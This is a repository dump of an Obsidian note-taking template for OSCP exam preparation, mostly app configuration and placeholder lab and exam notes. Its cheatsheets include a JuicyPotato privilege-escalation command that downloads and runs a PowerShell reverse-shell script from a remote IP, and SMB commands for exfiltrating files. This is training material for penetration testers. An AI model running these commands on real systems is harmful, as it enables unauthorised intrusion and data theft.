├── .obsidian ├── app.json ├── appearance.json ├── core-plugins-migration.json ├── core-plugins.json ├── graph.json ├── hotkeys.json ├── workspace ├── workspace.json └── workspaces.json ├── Attachments ├── Pasted image 20210418203944.png ├── Pasted image 20210813173305.png ├── Pasted image 20210813180944.png └── Pasted image 20230324145839.png ├── Cheatsheets ├── Common Exploits │ └── Potato Exploits.md ├── Common Tools │ └── Git Dumper.md ├── Privilege Escalation - Windows │ └── File Transfer - SMB Server.md └── Useful Commands - Linux │ └── Find Writeable Directories.md ├── Course Notes ├── Chapter X - Title.md ├── Chapter Y - Title.md └── Course Notes Index.md ├── Exam ├── AD Set │ ├── AD Set Domain Index.md │ ├── Active Directory Set.canvas │ ├── Client 1 │ │ ├── 00 - Overview.md │ │ ├── 10 - Client-Side Attack.md │ │ └── Exam Client 1 Index.md │ ├── Client 2 │ │ ├── 00 - Overview.md │ │ └── Exam Client 2 Index.md │ ├── Domain Controller │ │ ├── 00 - Overview.md │ │ └── Exam DC Index.md │ └── Password Spray (example.corp).md ├── Exam Index.md ├── Independent Machine 1 │ ├── 00 - Overview.md │ └── Exam Machine 1 Index.md ├── Independent Machine 2 │ ├── 00 - Overview.md │ └── Exam Machine 2 Index.md └── Independent Machine 3 │ ├── 00 - Overview.md │ └── Exam Machine 3 Index.md ├── Labs ├── 10.0.0.1 (Andy) │ ├── 00 - Overview.md │ ├── 05 - Enumeration.md │ ├── 10 - Website.md │ ├── 15 - Shell as Andy.md │ ├── 16 - Potential Local Exploits.md │ ├── 20 - Post Exploitation.md │ └── Andy Index.md ├── 10.0.0.2 │ ├── 00 - Overview.md │ ├── 05 - Enumeration.md │ └── 10.0.0.2 Index.md ├── 10.1.0.1 (Sandy) │ ├── 00 - Overview.md │ ├── 05 - Enumeration.md │ └── Sandy Index.md ├── Lab Loot.md ├── Labs Index.md ├── Lessons Learned.md ├── Live Hosts.md └── Network Scans.md ├── README.md └── Resources ├── Communities.md ├── Cybersecurity Notes.md ├── Exam Details.md ├── Exam Tips.md ├── Report Templates.md └── Tools.md /.obsidian/app.json: 
-------------------------------------------------------------------------------- 1 | { 2 | "attachmentFolderPath": "Attachments", 3 | "pdfExportSettings": { 4 | "pageSize": "Letter", 5 | "landscape": false, 6 | "margin": "0", 7 | "downscalePercent": 100 8 | } 9 | } -------------------------------------------------------------------------------- /.obsidian/appearance.json: -------------------------------------------------------------------------------- 1 | { 2 | "baseFontSize": 16, 3 | "accentColor": "" 4 | } -------------------------------------------------------------------------------- /.obsidian/core-plugins-migration.json: -------------------------------------------------------------------------------- 1 | { 2 | "file-explorer": true, 3 | "global-search": true, 4 | "switcher": true, 5 | "graph": true, 6 | "backlink": true, 7 | "outgoing-link": false, 8 | "tag-pane": false, 9 | "page-preview": true, 10 | "daily-notes": false, 11 | "templates": false, 12 | "note-composer": true, 13 | "command-palette": true, 14 | "slash-command": false, 15 | "editor-status": false, 16 | "starred": false, 17 | "markdown-importer": true, 18 | "zk-prefixer": false, 19 | "random-note": false, 20 | "outline": true, 21 | "word-count": true, 22 | "slides": false, 23 | "audio-recorder": false, 24 | "workspaces": true, 25 | "file-recovery": true, 26 | "publish": false, 27 | "sync": false, 28 | "canvas": true 29 | } -------------------------------------------------------------------------------- /.obsidian/core-plugins.json: -------------------------------------------------------------------------------- 1 | [ 2 | "file-explorer", 3 | "global-search", 4 | "switcher", 5 | "graph", 6 | "backlink", 7 | "canvas", 8 | "page-preview", 9 | "note-composer", 10 | "command-palette", 11 | "markdown-importer", 12 | "outline", 13 | "word-count", 14 | "workspaces", 15 | "file-recovery" 16 | ] -------------------------------------------------------------------------------- /.obsidian/graph.json: 
-------------------------------------------------------------------------------- 1 | { 2 | "collapse-filter": true, 3 | "search": "", 4 | "showTags": false, 5 | "showAttachments": false, 6 | "hideUnresolved": false, 7 | "showOrphans": true, 8 | "collapse-color-groups": true, 9 | "colorGroups": [], 10 | "collapse-display": true, 11 | "showArrow": false, 12 | "textFadeMultiplier": 0, 13 | "nodeSizeMultiplier": 1, 14 | "lineSizeMultiplier": 1, 15 | "collapse-forces": true, 16 | "centerStrength": 0.518713248970312, 17 | "repelStrength": 10, 18 | "linkStrength": 1, 19 | "linkDistance": 250, 20 | "scale": 0.7192927393119641, 21 | "close": false 22 | } -------------------------------------------------------------------------------- /.obsidian/hotkeys.json: -------------------------------------------------------------------------------- 1 | { 2 | "editor:cycle-list-checklist": [ 3 | { 4 | "modifiers": [ 5 | "Mod" 6 | ], 7 | "key": "Enter" 8 | } 9 | ], 10 | "editor:open-link-in-new-leaf": [ 11 | { 12 | "modifiers": [ 13 | "Mod", 14 | "Shift" 15 | ], 16 | "key": "Enter" 17 | } 18 | ] 19 | } -------------------------------------------------------------------------------- /.obsidian/workspace: -------------------------------------------------------------------------------- 1 | { 2 | "main": { 3 | "id": "0a4681d1bd0f3ccd", 4 | "type": "split", 5 | "children": [ 6 | { 7 | "id": "3d7d6acb4e46f794", 8 | "type": "leaf", 9 | "state": { 10 | "type": "graph", 11 | "state": {} 12 | } 13 | } 14 | ], 15 | "direction": "vertical" 16 | }, 17 | "left": { 18 | "id": "def75e95f6b85e9f", 19 | "type": "split", 20 | "children": [ 21 | { 22 | "id": "48964a4f8b13207c", 23 | "type": "tabs", 24 | "children": [ 25 | { 26 | "id": "45c4f1d872e58605", 27 | "type": "leaf", 28 | "state": { 29 | "type": "file-explorer", 30 | "state": {} 31 | } 32 | }, 33 | { 34 | "id": "df395571c07f867d", 35 | "type": "leaf", 36 | "state": { 37 | "type": "search", 38 | "state": { 39 | "query": "enumeration", 40 | 
"matchingCase": false, 41 | "explainSearch": false, 42 | "collapseAll": false, 43 | "extraContext": false, 44 | "sortOrder": "alphabetical" 45 | } 46 | } 47 | } 48 | ] 49 | } 50 | ], 51 | "direction": "horizontal", 52 | "width": 300 53 | }, 54 | "right": { 55 | "id": "43f2b1dd61471c59", 56 | "type": "split", 57 | "children": [ 58 | { 59 | "id": "baacf29172e998d7", 60 | "type": "tabs", 61 | "children": [ 62 | { 63 | "id": "7209f9740a382644", 64 | "type": "leaf", 65 | "state": { 66 | "type": "backlink", 67 | "state": { 68 | "collapseAll": false, 69 | "extraContext": false, 70 | "sortOrder": "alphabetical", 71 | "showSearch": false, 72 | "searchQuery": "", 73 | "backlinkCollapsed": false, 74 | "unlinkedCollapsed": true 75 | } 76 | } 77 | }, 78 | { 79 | "id": "bebc0463f0feae2b", 80 | "type": "leaf", 81 | "state": { 82 | "type": "outline", 83 | "state": {} 84 | } 85 | } 86 | ] 87 | } 88 | ], 89 | "direction": "horizontal", 90 | "width": 300, 91 | "collapsed": true 92 | }, 93 | "active": "3d7d6acb4e46f794", 94 | "lastOpenFiles": [ 95 | "README.md", 96 | "Resources/Tools.md", 97 | "Resources/Report Templates.md", 98 | "Resources/Exam Tips.md", 99 | "Resources/Exam Details.md", 100 | "Resources/Cybersecurity Notes.md", 101 | "Resources/Communities.md", 102 | "Labs/Network Scans.md", 103 | "Labs/Live Hosts.md", 104 | "Labs/Lessons Learned.md" 105 | ] 106 | } -------------------------------------------------------------------------------- /.obsidian/workspace.json: -------------------------------------------------------------------------------- 1 | { 2 | "main": { 3 | "id": "0a4681d1bd0f3ccd", 4 | "type": "split", 5 | "children": [ 6 | { 7 | "id": "2e2067be550c900f", 8 | "type": "tabs", 9 | "children": [ 10 | { 11 | "id": "e6c1f0bfd59e7b9d", 12 | "type": "leaf", 13 | "state": { 14 | "type": "markdown", 15 | "state": { 16 | "file": "README.md", 17 | "mode": "preview", 18 | "source": false 19 | } 20 | } 21 | }, 22 | { 23 | "id": "e75609a1db549e0b", 24 | "type": "leaf", 25 | 
"state": { 26 | "type": "graph", 27 | "state": {} 28 | } 29 | } 30 | ] 31 | } 32 | ], 33 | "direction": "vertical" 34 | }, 35 | "left": { 36 | "id": "def75e95f6b85e9f", 37 | "type": "split", 38 | "children": [ 39 | { 40 | "id": "48964a4f8b13207c", 41 | "type": "tabs", 42 | "children": [ 43 | { 44 | "id": "45c4f1d872e58605", 45 | "type": "leaf", 46 | "state": { 47 | "type": "file-explorer", 48 | "state": { 49 | "sortOrder": "alphabetical" 50 | } 51 | } 52 | }, 53 | { 54 | "id": "df395571c07f867d", 55 | "type": "leaf", 56 | "state": { 57 | "type": "search", 58 | "state": { 59 | "query": "enumeration", 60 | "matchingCase": false, 61 | "explainSearch": false, 62 | "collapseAll": false, 63 | "extraContext": false, 64 | "sortOrder": "alphabetical" 65 | } 66 | } 67 | } 68 | ] 69 | } 70 | ], 71 | "direction": "horizontal", 72 | "width": 300, 73 | "collapsed": true 74 | }, 75 | "right": { 76 | "id": "43f2b1dd61471c59", 77 | "type": "split", 78 | "children": [ 79 | { 80 | "id": "baacf29172e998d7", 81 | "type": "tabs", 82 | "children": [ 83 | { 84 | "id": "7209f9740a382644", 85 | "type": "leaf", 86 | "state": { 87 | "type": "backlink", 88 | "state": { 89 | "file": "README.md", 90 | "collapseAll": false, 91 | "extraContext": false, 92 | "sortOrder": "alphabetical", 93 | "showSearch": false, 94 | "searchQuery": "", 95 | "backlinkCollapsed": false, 96 | "unlinkedCollapsed": true 97 | } 98 | } 99 | }, 100 | { 101 | "id": "bebc0463f0feae2b", 102 | "type": "leaf", 103 | "state": { 104 | "type": "outline", 105 | "state": { 106 | "file": "README.md" 107 | } 108 | } 109 | } 110 | ], 111 | "currentTab": 1 112 | } 113 | ], 114 | "direction": "horizontal", 115 | "width": 300, 116 | "collapsed": true 117 | }, 118 | "left-ribbon": { 119 | "hiddenItems": { 120 | "switcher:Open quick switcher": false, 121 | "graph:Open graph view": false, 122 | "canvas:Create new canvas": false, 123 | "command-palette:Open command palette": false, 124 | "markdown-importer:Open format converter": false, 125 | 
"workspaces:Manage workspace layouts": false 126 | } 127 | }, 128 | "active": "e6c1f0bfd59e7b9d", 129 | "lastOpenFiles": [ 130 | "Exam/Exam Index.md", 131 | "Exam/AD Set/AD Set Domain Index.md", 132 | "README.md", 133 | "Labs/Lessons Learned.md", 134 | "Resources/Tools.md", 135 | "Resources/Report Templates.md", 136 | "Resources/Exam Tips.md", 137 | "Resources/Exam Details.md", 138 | "Resources/Cybersecurity Notes.md", 139 | "Resources/Communities.md", 140 | "Labs/Network Scans.md", 141 | "Labs/Live Hosts.md", 142 | "Labs/Labs Index.md", 143 | "Labs/Lab Loot.md", 144 | "Labs/10.1.0.1 (Sandy)/Sandy Index.md", 145 | "Labs/10.1.0.1 (Sandy)/05 - Enumeration.md", 146 | "Labs/10.1.0.1 (Sandy)/00 - Overview.md", 147 | "Labs/10.0.0.2/10.0.0.2 Index.md", 148 | "Labs/10.0.0.2/05 - Enumeration.md", 149 | "Labs/10.0.0.2/00 - Overview.md", 150 | "Labs/10.0.0.1 (Andy)/Andy Index.md", 151 | "Labs/10.0.0.1 (Andy)/20 - Post Exploitation.md", 152 | "Labs/10.0.0.1 (Andy)/16 - Potential Local Exploits.md", 153 | "Labs/10.0.0.1 (Andy)/15 - Shell as Andy.md", 154 | "Labs/10.0.0.1 (Andy)/10 - Website.md", 155 | "Labs/10.0.0.1 (Andy)/05 - Enumeration.md", 156 | "Exam/AD Set/Active Directory Set.canvas", 157 | "Exam/AD Set/Client 2", 158 | "Exam/AD Set/Client 1", 159 | "Exam/AD Set/Domain Controller", 160 | "Exam/Independent Machine 3", 161 | "Exam/Independent Machine 2", 162 | "Exam/Independent Machine 1", 163 | "Exam/AD Set" 164 | ] 165 | } -------------------------------------------------------------------------------- /.obsidian/workspaces.json: -------------------------------------------------------------------------------- 1 | { 2 | "workspaces": { 3 | "Exam": { 4 | "main": { 5 | "id": "0a4681d1bd0f3ccd", 6 | "type": "split", 7 | "children": [ 8 | { 9 | "id": "2e2067be550c900f", 10 | "type": "tabs", 11 | "children": [ 12 | { 13 | "id": "e6c1f0bfd59e7b9d", 14 | "type": "leaf", 15 | "state": { 16 | "type": "markdown", 17 | "state": { 18 | "file": "Exam/Exam Index.md", 19 | "mode": 
"source", 20 | "source": false 21 | } 22 | } 23 | }, 24 | { 25 | "id": "d46eb58c16340752", 26 | "type": "leaf", 27 | "state": { 28 | "type": "canvas", 29 | "state": { 30 | "file": "Exam/AD Set/Active Directory Set.canvas", 31 | "viewState": { 32 | "x": -60, 33 | "y": 170, 34 | "zoom": -0.6602785096924807 35 | } 36 | } 37 | } 38 | } 39 | ] 40 | } 41 | ], 42 | "direction": "vertical" 43 | }, 44 | "left": { 45 | "id": "def75e95f6b85e9f", 46 | "type": "split", 47 | "children": [ 48 | { 49 | "id": "48964a4f8b13207c", 50 | "type": "tabs", 51 | "children": [ 52 | { 53 | "id": "45c4f1d872e58605", 54 | "type": "leaf", 55 | "state": { 56 | "type": "file-explorer", 57 | "state": { 58 | "sortOrder": "alphabetical" 59 | } 60 | } 61 | }, 62 | { 63 | "id": "df395571c07f867d", 64 | "type": "leaf", 65 | "state": { 66 | "type": "search", 67 | "state": { 68 | "query": "enumeration", 69 | "matchingCase": false, 70 | "explainSearch": false, 71 | "collapseAll": false, 72 | "extraContext": false, 73 | "sortOrder": "alphabetical" 74 | } 75 | } 76 | } 77 | ] 78 | } 79 | ], 80 | "direction": "horizontal", 81 | "width": 300, 82 | "collapsed": true 83 | }, 84 | "right": { 85 | "id": "43f2b1dd61471c59", 86 | "type": "split", 87 | "children": [ 88 | { 89 | "id": "baacf29172e998d7", 90 | "type": "tabs", 91 | "children": [ 92 | { 93 | "id": "7209f9740a382644", 94 | "type": "leaf", 95 | "state": { 96 | "type": "backlink", 97 | "state": { 98 | "file": "Exam/Exam Index.md", 99 | "collapseAll": false, 100 | "extraContext": false, 101 | "sortOrder": "alphabetical", 102 | "showSearch": false, 103 | "searchQuery": "", 104 | "backlinkCollapsed": false, 105 | "unlinkedCollapsed": true 106 | } 107 | } 108 | }, 109 | { 110 | "id": "bebc0463f0feae2b", 111 | "type": "leaf", 112 | "state": { 113 | "type": "outline", 114 | "state": { 115 | "file": "Exam/Exam Index.md" 116 | } 117 | } 118 | } 119 | ] 120 | } 121 | ], 122 | "direction": "horizontal", 123 | "width": 300, 124 | "collapsed": true 125 | }, 126 | 
"left-ribbon": { 127 | "hiddenItems": { 128 | "switcher:Open quick switcher": false, 129 | "graph:Open graph view": false, 130 | "canvas:Create new canvas": false, 131 | "command-palette:Open command palette": false, 132 | "markdown-importer:Open format converter": false, 133 | "workspaces:Manage workspace layouts": false 134 | } 135 | }, 136 | "active": "45c4f1d872e58605" 137 | }, 138 | "Labs": { 139 | "main": { 140 | "id": "0a4681d1bd0f3ccd", 141 | "type": "split", 142 | "children": [ 143 | { 144 | "id": "86c4aff70f677f79", 145 | "type": "tabs", 146 | "children": [ 147 | { 148 | "id": "646461a817ee0222", 149 | "type": "leaf", 150 | "state": { 151 | "type": "markdown", 152 | "state": { 153 | "file": "Labs/Labs Index.md", 154 | "mode": "source", 155 | "source": false 156 | } 157 | } 158 | }, 159 | { 160 | "id": "993507b08487f1ed", 161 | "type": "leaf", 162 | "state": { 163 | "type": "markdown", 164 | "state": { 165 | "file": "Labs/Lessons Learned.md", 166 | "mode": "source", 167 | "source": false 168 | } 169 | } 170 | }, 171 | { 172 | "id": "662ec8cfb1461956", 173 | "type": "leaf", 174 | "state": { 175 | "type": "markdown", 176 | "state": { 177 | "file": "Labs/Live Hosts.md", 178 | "mode": "source", 179 | "source": false 180 | } 181 | } 182 | }, 183 | { 184 | "id": "5e45acc4eed54f5f", 185 | "type": "leaf", 186 | "state": { 187 | "type": "markdown", 188 | "state": { 189 | "file": "Labs/Network Scans.md", 190 | "mode": "source", 191 | "source": false 192 | } 193 | } 194 | }, 195 | { 196 | "id": "f788e8dd21a5de5d", 197 | "type": "leaf", 198 | "state": { 199 | "type": "markdown", 200 | "state": { 201 | "file": "Labs/Lab Loot.md", 202 | "mode": "source", 203 | "source": false 204 | } 205 | } 206 | } 207 | ] 208 | } 209 | ], 210 | "direction": "vertical" 211 | }, 212 | "left": { 213 | "id": "def75e95f6b85e9f", 214 | "type": "split", 215 | "children": [ 216 | { 217 | "id": "48964a4f8b13207c", 218 | "type": "tabs", 219 | "children": [ 220 | { 221 | "id": 
"45c4f1d872e58605", 222 | "type": "leaf", 223 | "state": { 224 | "type": "file-explorer", 225 | "state": { 226 | "sortOrder": "alphabetical" 227 | } 228 | } 229 | }, 230 | { 231 | "id": "df395571c07f867d", 232 | "type": "leaf", 233 | "state": { 234 | "type": "search", 235 | "state": { 236 | "query": "enumeration", 237 | "matchingCase": false, 238 | "explainSearch": false, 239 | "collapseAll": false, 240 | "extraContext": false, 241 | "sortOrder": "alphabetical" 242 | } 243 | } 244 | } 245 | ] 246 | } 247 | ], 248 | "direction": "horizontal", 249 | "width": 300, 250 | "collapsed": true 251 | }, 252 | "right": { 253 | "id": "43f2b1dd61471c59", 254 | "type": "split", 255 | "children": [ 256 | { 257 | "id": "baacf29172e998d7", 258 | "type": "tabs", 259 | "children": [ 260 | { 261 | "id": "7209f9740a382644", 262 | "type": "leaf", 263 | "state": { 264 | "type": "backlink", 265 | "state": { 266 | "file": "Labs/Labs Index.md", 267 | "collapseAll": false, 268 | "extraContext": false, 269 | "sortOrder": "alphabetical", 270 | "showSearch": false, 271 | "searchQuery": "", 272 | "backlinkCollapsed": false, 273 | "unlinkedCollapsed": true 274 | } 275 | } 276 | }, 277 | { 278 | "id": "bebc0463f0feae2b", 279 | "type": "leaf", 280 | "state": { 281 | "type": "outline", 282 | "state": { 283 | "file": "Labs/Labs Index.md" 284 | } 285 | } 286 | } 287 | ] 288 | } 289 | ], 290 | "direction": "horizontal", 291 | "width": 300, 292 | "collapsed": true 293 | }, 294 | "left-ribbon": { 295 | "hiddenItems": { 296 | "switcher:Open quick switcher": false, 297 | "graph:Open graph view": false, 298 | "canvas:Create new canvas": false, 299 | "command-palette:Open command palette": false, 300 | "markdown-importer:Open format converter": false, 301 | "workspaces:Manage workspace layouts": false 302 | } 303 | }, 304 | "active": "646461a817ee0222" 305 | }, 306 | "Home": { 307 | "main": { 308 | "id": "0a4681d1bd0f3ccd", 309 | "type": "split", 310 | "children": [ 311 | { 312 | "id": "2e2067be550c900f", 
313 | "type": "tabs", 314 | "children": [ 315 | { 316 | "id": "e6c1f0bfd59e7b9d", 317 | "type": "leaf", 318 | "state": { 319 | "type": "markdown", 320 | "state": { 321 | "file": "README.md", 322 | "mode": "preview", 323 | "source": false 324 | } 325 | } 326 | }, 327 | { 328 | "id": "5dc24bc89673c7e7", 329 | "type": "leaf", 330 | "state": { 331 | "type": "graph", 332 | "state": {} 333 | } 334 | } 335 | ] 336 | } 337 | ], 338 | "direction": "vertical" 339 | }, 340 | "left": { 341 | "id": "def75e95f6b85e9f", 342 | "type": "split", 343 | "children": [ 344 | { 345 | "id": "48964a4f8b13207c", 346 | "type": "tabs", 347 | "children": [ 348 | { 349 | "id": "45c4f1d872e58605", 350 | "type": "leaf", 351 | "state": { 352 | "type": "file-explorer", 353 | "state": { 354 | "sortOrder": "alphabetical" 355 | } 356 | } 357 | }, 358 | { 359 | "id": "df395571c07f867d", 360 | "type": "leaf", 361 | "state": { 362 | "type": "search", 363 | "state": { 364 | "query": "enumeration", 365 | "matchingCase": false, 366 | "explainSearch": false, 367 | "collapseAll": false, 368 | "extraContext": false, 369 | "sortOrder": "alphabetical" 370 | } 371 | } 372 | } 373 | ] 374 | } 375 | ], 376 | "direction": "horizontal", 377 | "width": 300, 378 | "collapsed": true 379 | }, 380 | "right": { 381 | "id": "43f2b1dd61471c59", 382 | "type": "split", 383 | "children": [ 384 | { 385 | "id": "baacf29172e998d7", 386 | "type": "tabs", 387 | "children": [ 388 | { 389 | "id": "7209f9740a382644", 390 | "type": "leaf", 391 | "state": { 392 | "type": "backlink", 393 | "state": { 394 | "file": "README.md", 395 | "collapseAll": false, 396 | "extraContext": false, 397 | "sortOrder": "alphabetical", 398 | "showSearch": false, 399 | "searchQuery": "", 400 | "backlinkCollapsed": false, 401 | "unlinkedCollapsed": true 402 | } 403 | } 404 | }, 405 | { 406 | "id": "bebc0463f0feae2b", 407 | "type": "leaf", 408 | "state": { 409 | "type": "outline", 410 | "state": { 411 | "file": "README.md" 412 | } 413 | } 414 | } 415 | ], 416 
| "currentTab": 1 417 | } 418 | ], 419 | "direction": "horizontal", 420 | "width": 300, 421 | "collapsed": true 422 | }, 423 | "left-ribbon": { 424 | "hiddenItems": { 425 | "switcher:Open quick switcher": false, 426 | "graph:Open graph view": false, 427 | "canvas:Create new canvas": false, 428 | "command-palette:Open command palette": false, 429 | "markdown-importer:Open format converter": false, 430 | "workspaces:Manage workspace layouts": false 431 | } 432 | }, 433 | "active": "e6c1f0bfd59e7b9d" 434 | } 435 | }, 436 | "active": "Home" 437 | } -------------------------------------------------------------------------------- /Attachments/Pasted image 20210418203944.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/OSCP-Notes-Template/885996b9ca65b1dab505c3162a54b251e8c5e521/Attachments/Pasted image 20210418203944.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210813173305.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/OSCP-Notes-Template/885996b9ca65b1dab505c3162a54b251e8c5e521/Attachments/Pasted image 20210813173305.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210813180944.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/OSCP-Notes-Template/885996b9ca65b1dab505c3162a54b251e8c5e521/Attachments/Pasted image 20210813180944.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20230324145839.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/OSCP-Notes-Template/885996b9ca65b1dab505c3162a54b251e8c5e521/Attachments/Pasted image 20230324145839.png 
-------------------------------------------------------------------------------- /Cheatsheets/Common Exploits/Potato Exploits.md: -------------------------------------------------------------------------------- 1 | ## Required Privileges 2 | 3 | - `SeImpersonatePrivilege` OR 4 | - `SeAssignPrimaryTokenPrivilege` 5 | 6 | ## Juicy Potato 7 | 8 | Repo: [https://github.com/ohpe/juicy-potato](https://github.com/ohpe/juicy-potato) 9 | 10 | List of CLSIDs: 11 | - [https://github.com/ohpe/juicy-potato/tree/master/CLSID](https://github.com/ohpe/juicy-potato/tree/master/CLSID) 12 | - Mirror: [http://ohpe.it/juicy-potato/CLSID/](http://ohpe.it/juicy-potato/CLSID/) 13 | 14 | ### Usage 15 | 16 | #### 64-bit 17 | 18 | ```cmd 19 | c:> JuicyPotatox86.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://192.168.119.130:8080/minirev.ps1')" -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020} 20 | ``` -------------------------------------------------------------------------------- /Cheatsheets/Common Tools/Git Dumper.md: -------------------------------------------------------------------------------- 1 | ## Basic Usage 2 | 3 | ```bash 4 | $ /opt/git-dumper/git-dumper.py [TARGET_SITE]/.git [OUTPUT_DIRECTORY] 5 | ``` -------------------------------------------------------------------------------- /Cheatsheets/Privilege Escalation - Windows/File Transfer - SMB Server.md: -------------------------------------------------------------------------------- 1 | # File Transfer with SMB Server 2 | 3 | ## Simple SMB Server 4 | 5 | With `impacket-smbserver`: 6 | 7 | ``` 8 | sudo impacket-smbserver [SHARE_NAME] [PATH_TO_SHARE] 9 | ``` 10 | 11 | E.g. to serve the current directory: 12 | 13 | ``` 14 | sudo impacket-smbserver share . 15 | ``` 16 | 17 | To copy from the share to a Windows client: 18 | 19 | ``` 20 | copy \\[IP]\share\file 21 | ``` 22 | 23 | To copy to the share (i.e. 
exfiltrate a file): 24 | 25 | ``` 26 | copy [FILE] \\[IP]\share 27 | ``` 28 | 29 | ## SMB 2 With Password 30 | 31 | If you receive this message when connecting to an SMB server: 32 | 33 | ``` 34 | You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack. 35 | Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747 36 | ``` 37 | 38 | You can start an SMB server in SMB 2.0 mode with a password: 39 | 40 | ``` 41 | $ impacket-smbserver share . -smb2support -username test -password test 42 | ``` 43 | 44 | To connect to the share, run: 45 | 46 | ``` 47 | net use z: \\[IP]\share /u:test test 48 | ``` 49 | 50 | Download/upload as normal: 51 | 52 | ``` 53 | copy file \\[IP]\share 54 | ``` -------------------------------------------------------------------------------- /Cheatsheets/Useful Commands - Linux/Find Writeable Directories.md: -------------------------------------------------------------------------------- 1 | ``` 2 | find / -writable -type d 2>/dev/null # folders writable by the current user 3 | find / -perm -222 -type d 2>/dev/null # world-writeable folders 4 | find / -perm -o+w -type d 2>/dev/null # world-writeable folders 5 | ``` -------------------------------------------------------------------------------- /Course Notes/Chapter X - Title.md: -------------------------------------------------------------------------------- 1 | ## Section 1 2 | 3 | ### Subsection 1.1 4 | 5 | ## Section 2 6 | 7 | ## Section 3 8 | 9 | ## Exercises To-Do 10 | 11 | - [x] 1.1.1 (page 10) 12 | - [ ] 1.1.2 (page 12) -------------------------------------------------------------------------------- /Course Notes/Chapter Y - Title.md: -------------------------------------------------------------------------------- 1 | ## Section 1 2 | 3 | ## Section 2 4 | 5 | ## Exercises To-Do 6 | 7 | - [ ] 2.1.1 (page 20) 
-------------------------------------------------------------------------------- /Course Notes/Course Notes Index.md: -------------------------------------------------------------------------------- 1 | This folder contains the notes I've made on each chapter of the course material. 2 | 3 | ## Chapters 4 | 5 | Chapter X Notes: [[Chapter X - Title]] 6 | 7 | Chapter Y Notes: [[Chapter Y - Title]] 8 | 9 | ## To-Do 10 | 11 | - [x] Chapter X 12 | - [x] Chapter Y 13 | - [ ] Chapter Z -------------------------------------------------------------------------------- /Exam/AD Set/AD Set Domain Index.md: -------------------------------------------------------------------------------- 1 | Domain Name: example.corp 2 | 3 | Machines: 4 | - Domain Controller: [[Exam DC Index]] 5 | - Client 1: [[Exam Client 1 Index]] 6 | - Client 2: [[Exam Client 2 Index]] 7 | 8 | ## Attack Overview 9 | 10 | This set involves a client-side attack on [[Exam Client 1 Index|Client 1]] and... 11 | 12 | ## Domain-Wide Attacks and Enumeration 13 | 14 | Store links to notes on attacks that are not specific to one client here, e.g. 
scanning of the full network/password spraying 15 | 16 | Password Spraying: [[Password Spray (example.corp)]] -------------------------------------------------------------------------------- /Exam/AD Set/Active Directory Set.canvas: -------------------------------------------------------------------------------- 1 | { 2 | "nodes":[ 3 | {"id":"078c52b2510d2610","x":-260,"y":-460,"width":400,"height":400,"type":"file","file":"Exam/AD Set/AD Set Domain Index.md"}, 4 | {"id":"7dbbd7daef43d049","x":-740,"y":140,"width":400,"height":400,"type":"file","file":"Exam/AD Set/Domain Controller/Exam DC Index.md"}, 5 | {"id":"6c134f90e268b745","x":220,"y":140,"width":400,"height":400,"type":"file","file":"Exam/Independent Machine 1/Exam Machine 1 Index.md"}, 6 | {"id":"b292f3d377778c1b","x":-260,"y":140,"width":400,"height":400,"type":"file","file":"Exam/Independent Machine 2/Exam Machine 2 Index.md"}, 7 | {"id":"54de32064c482631","x":288,"y":720,"width":265,"height":80,"type":"text","text":"Compromise via client-side attack"}, 8 | {"id":"aee10bc68d6c182d","x":-185,"y":730,"width":250,"height":60,"type":"text","text":"Pivot with creds"} 9 | ], 10 | "edges":[ 11 | {"id":"b086030cf5b48ec1","fromNode":"54de32064c482631","fromSide":"top","toNode":"6c134f90e268b745","toSide":"bottom"}, 12 | {"id":"a3633ad5c6b0952f","fromNode":"54de32064c482631","fromSide":"left","toNode":"aee10bc68d6c182d","toSide":"right"}, 13 | {"id":"7aec2d392dbcf08f","fromNode":"aee10bc68d6c182d","fromSide":"top","toNode":"b292f3d377778c1b","toSide":"bottom"}, 14 | {"id":"be6a69407befc7f2","fromNode":"aee10bc68d6c182d","fromSide":"left","toNode":"7dbbd7daef43d049","toSide":"bottom"} 15 | ] 16 | } -------------------------------------------------------------------------------- /Exam/AD Set/Client 1/00 - Overview.md: -------------------------------------------------------------------------------- 1 | # AD Set Client 1 Overview 2 | 3 | Machine Details: 4 | 5 | |IP|Hostname|Operating System| 6 | |---|---|---| 7 | 
|10.0.11.2|client1.example.corp|Windows 10| -------------------------------------------------------------------------------- /Exam/AD Set/Client 1/10 - Client-Side Attack.md: -------------------------------------------------------------------------------- 1 | I performed a client-side attack to gain a foothold in the network... -------------------------------------------------------------------------------- /Exam/AD Set/Client 1/Exam Client 1 Index.md: -------------------------------------------------------------------------------- 1 | Overview: [[Exam/AD Set/Client 1/00 - Overview]] 2 | 3 | Client-Side Attack: [[10 - Client-Side Attack]] -------------------------------------------------------------------------------- /Exam/AD Set/Client 2/00 - Overview.md: -------------------------------------------------------------------------------- 1 | # AD Set Client 2 Overview 2 | 3 | Machine Details: 4 | 5 | |IP|Hostname|Operating System| 6 | |---|---|---| 7 | |10.0.11.3|client2.example.corp|Windows 10| -------------------------------------------------------------------------------- /Exam/AD Set/Client 2/Exam Client 2 Index.md: -------------------------------------------------------------------------------- 1 | Overview: [[Exam/AD Set/Client 2/00 - Overview]] -------------------------------------------------------------------------------- /Exam/AD Set/Domain Controller/00 - Overview.md: -------------------------------------------------------------------------------- 1 | Machine Details: 2 | 3 | |IP|Hostname|Operating System| 4 | |---|---|---| 5 | |10.0.11.2|DC.example.corp|Windows Server 2019| -------------------------------------------------------------------------------- /Exam/AD Set/Domain Controller/Exam DC Index.md: -------------------------------------------------------------------------------- 1 | Overview: [[Exam/AD Set/Domain Controller/00 - Overview]] -------------------------------------------------------------------------------- /Exam/AD Set/Password Spray 
